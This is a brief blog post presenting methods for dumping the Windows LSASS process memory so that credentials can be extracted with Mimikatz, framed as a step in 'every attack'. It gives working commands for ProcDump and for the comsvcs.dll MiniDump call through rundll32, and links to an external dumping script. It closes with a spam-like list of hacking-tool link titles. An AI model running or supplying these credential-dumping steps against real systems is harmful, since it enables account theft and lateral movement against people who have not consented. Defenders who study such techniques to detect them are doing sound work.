Wednesday, April 15, 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















More info
  1. Pentest Tools Website
  2. Hack Tool Apk
  3. Tools For Hacker
  4. Pentest Tools Review
  5. Pentest Tools Nmap
  6. Hak5 Tools
  7. Free Pentest Tools For Windows
  8. Hacker Tools Linux
  9. Nsa Hack Tools Download
  10. Nsa Hack Tools Download
  11. Hack App
  12. Hacking Tools And Software
  13. Pentest Tools Online
  14. Hacking Tools Github
  15. Pentest Tools Website Vulnerability
  16. Hacker Tools Apk Download
  17. Pentest Tools For Windows
  18. Hacker Search Tools

No comments:

Post a Comment